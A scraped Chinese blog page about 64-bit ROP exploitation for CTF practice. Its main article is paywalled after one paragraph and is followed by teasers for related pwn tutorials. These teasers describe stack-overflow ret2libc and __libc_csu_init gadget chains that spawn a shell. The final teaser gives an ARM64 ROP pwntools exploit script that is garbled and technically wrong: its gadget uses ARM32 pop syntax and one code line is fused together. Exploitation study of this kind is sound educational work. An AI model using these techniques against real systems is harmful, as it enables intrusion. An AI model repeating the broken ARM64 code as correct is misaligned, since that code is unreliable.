64位ROP(level5)

最新推荐文章于 2022-09-12 19:09:50 发布
最新推荐文章于 2022-09-12 19:09:50 发布
阅读量1.4k 收藏 5
点赞数 2
分类专栏: pwn_study
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44642009/article/details/88934924
版权

64位ROP(level5)

开始接触的ROP都是针对于32位,和64位的比起来,主要是编址以及函数传参的方式不一样,32位的传参是直接将其压入栈中,我们便可以通过覆盖返回地址的方法,对函数的跳转进行控制而达到我们的目的,而64位的传参首先是使用六个寄存器,其次更多的参数压入栈中,其参数存放寄存器的顺序依次是 r d i rdi rdi, r s i rsi rsi, r d x rdx rdx, r c x rcx

最低0.47元/天 解锁文章
xiiexiin
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
64位ROP——通用gadget
qq_44759495的博客
04-09 2848
原理与目的 程序在编译的时候会加入一些通用函数来进行初始化操作,所以可以针对初始化函数来提取一些通用的gadget,通过泄露某个在libc中的内容在内存中的实际地址,通过计算偏移量来得到system和bin/sh的地址,然后利用返回指令ret连接代码,最终getshell。 实验步骤 chechsec命令检查是否有canary保护 图中显示并没有,如果有的话,就先进行泄露。 IDA反汇编 int...
第三次ROP (LEVEL 5)
weixin_43467772的博客
04-16 993
1、题目拿到是的一段C代码。 看到write 和 read 函数,猜测可以用栈溢出来getshell。 #include <stdio.h> #include <stdlib.h> #include <unistd.h> void vulnerable_function() { char buf[128]; read(STDIN_FILENO,...
ROP-中等-level5
ATFWUS的博客
02-29 776
这个题做了一下午。 文件下载地址: 链接:https://pan.baidu.com/s/1Ix7kc1ulu9a3OktifdUWWw 提取码:etug 0x01.分析 checksec: 64位程序,开启NX。 源码: 存在栈溢出,可利用的函数有red和write。暂时没有思路了。。。 0x02.新知识:利用__libc_csu_init 在x64程序中,前六...
暑期pwn! pwn! pang!(四) 64位ROP绕过 Emachine
qq_43342413的博客
07-19 506
先看看保护 是个64位的,开了栈不可执行保护,先玩玩这个程序 好了,到了开IDA的时间了,咱找到漏洞 int encrypt() { size_t v0; // rbx char s[48]; // [rsp+0h] [rbp-50h] __int16 v3; // [rsp+30h] [rbp-20h] memset(s, 0, sizeof(s)); v3 = 0; puts(“Input...
一步一步学习ROP之linux-x64
zsj2102的专栏
11-17 1008
0x00 序 ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。上次我们主要讨论了linux_x86的ROP攻击。 一步一步学ROP之linux_x86篇 http://drops.wooyun.org/tips/6597 在这次的教程中我们会带来上一篇的
64位栈溢出简单rop与简单例题的复现
goat_2003的博客
09-18 658
首先还是找到关键函数 可以看到有read栈溢出漏洞,有system函数,查看字符串,还可以看到"/bin/sh",既然这样,我们便可以一步到位直接通过rop将/bin/sh装入system函数中getshell。 如何通过rop实现传参呢?64位ELF是通过寄存器存放参数的,所以我们要想办法将/bin/sh放入rdi中并紧接着调用system函数。 那么该如何实现呢?我们假设一下,先通过pop edi将/bin/sh的地址压入edi中,然后再执行ret,并将此时的esp所指向栈空间的值改为system函数
rop64位程序中参数传递及栈溢出利用
RKAnjia的博客
11-24 827
ctf64位程序中参数传递及栈溢出利用rop 64位程序中参数传递及栈溢出利用 32位程序参数传递是直接弹出栈顶元素作为参数,而64位程序通过edi寄存器传参;因此在栈溢出漏洞利用的步骤为: 找到“pop edi\rdi;ret;”语句、system函数和“bin/sh”字符串的地址,输入数据:【填满栈空间的数据+覆盖edb的数据(32位大小为4h,64位大小为8h)+“pop edi\rdi;ret;”语句的地址+“bin/sh”字符串的地址+system函数的地址】。 具体执行过程: 子函数调用结束时,
深入探究64位rop链构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 1685
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一题做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
【How2Pwn】DreamHack x64下的ROP问题
Jeongon的博客
09-04 916
Pwn中的ROP问题演示
pwn篇:32位及64位无PIE保护ROP方法
weixin_44644249的博客
02-03 1287
32位和64位ROP方法 先记录一下,暂时还没有学会绕过PIE 源码 #include<stdio.h> #include<unistd.h> void vuln_func() { char buf[128]; read(STDIN_FILENO,buf,256);//溢出点 } int main(int argc,char* argv[]) { vuln_func(); write(STDOUT_FILENO,"Hello world\n",13); } 32位 编译
Pwn入门笔记(五)ROP
qq_33590156的博客
11-29 655
ROP32位的ROP64位ROP 32位的ROP 这个在栈基础中提到过,此处写出是为了和64位的形成对比。通过在返回地址上写上函数PLT的地址来实现跳转到函数,调用函数时压入参数后会压入eip(返回地址),然后32位程序参数在栈上,所以结构如下图: 栈底-高地址-> c b a 实际调用函数中的返回地址eip dddd 原返回地址(r) system的plt表地址 原ebp (s) aaaa aaaaaaaaaaaaaaa… 栈顶-低地址-> …
PWN入门(5)32位程序与64位程序和构造ROP
Ba1_Ma0的博客
09-12 1656
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
[CTF]jarvisoj_level2
凉水的博客
01-12 497
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
64位linux系统:栈溢出+ret2libc ROP attack
weixin_34232363的博客
06-03 903
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
CTF-浅尝64位栈溢出PWN
热门推荐
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
X64之ROP
amae_coder的博客
04-10 623
实验步骤: 首先拿到文件先看看有没有什么栈保护 因为在生成文件的时候我们就已经关掉了地址随机化,所以这里并没有什么栈保护 将文件拖入IDA中进行反编译,然后静态分析 这里有先写入hello world ,然后又进入了vulnerable_function函数,我们进入函数看看 我们发现用到了read函数,这里用到的是rbp定位,而它读了200个,实际rbp到ret只有(80...
小白详解rop emporium
BadRer的博客
08-02 2089
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
一步一步学 ROP 之 linux_x64 篇-level5
weixin_43489686的博客
02-02 1515
这道题是来自蒸米的一步一步学ROP之linux_x64篇中的level5,主要考察的是中级ROP中的__libc_csu_init。 原理 __libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000...
【CTF】32位/64位dlresolve最全总结(无地址泄露执行one_gadget)
panhewu9919的博客
09-05 1943
利用dl_resolve执行libc内任意gadget(不需泄露libc地址) 实验代码下载地址:https://github.com/bsauce/CTF/tree/master/dl_resolve_64 分析:0CTF的题目blackhole2,很简单的栈溢出,但是远程不允许回显,所以不能泄露libc_base,不能返回shell。程序本身所含有的gadget有限,所以能不能不泄露libc_...
arm64 的 rop 实现
最新发布
03-31
ROP(Return Oriented Programming)是一种攻击技术,通过在已有程序的可执行代码中找到一些已有的指令序列,然后通过构造栈帧和寄存器的值,将这些指令序列串联起来执行,以达到攻击的目的。 在ARM64架构中,ROP攻击的实现方式和x86架构类似,主要包括以下几个步骤: 1. 找到可用的指令序列:在程序的可执行代码中,找到一些已有的指令序列,这些指令序列可以实现ROP攻击的目的。 2. 构造栈帧:通过修改程序的栈帧,将ROP攻击所需要的参数和返回地址压入栈中。 3. 控制程序流程:通过修改程序的返回地址,将程序的控制流程跳转到已有的指令序列中,实现攻击的目的。 下面是一个简单的ARM64 ROP攻击的实现代码示例: ```c #include <stdio.h> #include <stdlib.h> #include <string.h> void vuln(char *buf) { char buf2[8]; strcpy(buf2, buf); printf("%s\n", buf2); } int main(int argc, char **argv) { char buf[8]; fgets(buf, 8, stdin); vuln(buf); return 0; } ``` 在这个示例程序中,存在一个栈溢出漏洞,在vuln函数中,将用户输入的字符串复制到了buf2数组中,如果输入的字符串长度超过了8个字节,就会发生栈溢出。 下面是一个简单的ROP攻击实现代码: ```python from pwn import * # gadget # pop {x0, x1, x2, x3, x4, x5, x6, x7, x8, lr}; ret; pop_x0_to_x8_lr = p64(0x4000f8) # mov x0, x1; mov x1, x2; mov x2, x3; mov x3, x4; mov x4, x5; mov x5, x6; mov x6, x7; mov x7, x8; blr x13; mov_x0_to_x8_blr_x13 = p64(0x400108) # system函数的地址 system_addr = p64(0x7ffff7a52370) # bin/sh字符串的地址 bin_sh_addr = p64(0x7ffff7b99e18) # 构造ROProp = b'' rop += pop_x0_to_x8_lr rop += bin_sh_addr rop += p64(0x0) * 7 rop += system_addr # 构造payload payload = b'A' * 8 payload += rop # 发送payload p = process('./vuln') p.sendline(payload) p.interactive() ``` 在这个示例中,我们首先找到了两个gadget:一个用于将参数压入寄存器中,另一个用于调用system函数。然后通过系统函数的地址和/bin/sh字符串的地址,构造了一个ROP链,将其作为输入,发送给目标程序,实现了一个简单的ROP攻击。 需要注意的是,由于ARM64架构中的指令是64位的,因此在构造ROP链时需要使用64位的地址和指令。另外,在实现ROP攻击时,还需要考虑栈保护和ASLR等安全机制的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值